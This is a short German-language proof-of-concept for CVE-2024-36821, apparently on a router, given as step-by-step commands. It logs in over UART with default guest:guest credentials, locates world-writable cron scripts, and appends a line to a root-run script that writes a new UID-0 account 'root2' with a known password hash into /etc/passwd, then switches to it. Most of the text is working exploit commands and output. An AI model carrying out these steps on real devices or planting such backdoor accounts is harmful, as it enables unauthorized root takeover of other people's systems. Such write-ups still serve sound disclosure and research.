
Die öffentliche Referenz, die die Mindestinformationen für die durch CVE-2024-36821 abgedeckte Schwachstelle enthält.
Die öffentliche Referenz, die die Mindestinformationen für die durch CVE-2024-36821 abgedeckte Schwachstelle enthält
Verbinden Sie sich mit dem Router über eine UART-Verbindung
Verwenden Sie die Anmeldeinformationen guest:guest, um sich im System anzumelden
Verwenden Sie den Befehl find / -perm -777 -type f 2>/dev/null, um Dateien mit Lese-Schreib-Ausführungsberechtigungen zu finden:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
Überprüfen Sie den Besitzer mit dem Befehl ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
Generieren Sie das Passwort mit dem Befehl openssl passwd Abracadabra
Bearbeiten Sie /tmp/cron/cron.everyminute/conntrack_collector.sh und fügen Sie am Ende das neu generierte Passwort hinzu:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
Warten Sie eine Minute
Wechseln Sie mit dem folgenden Befehl zum Benutzer root2:
/ $ su root2
Password: Abracadabra
~ #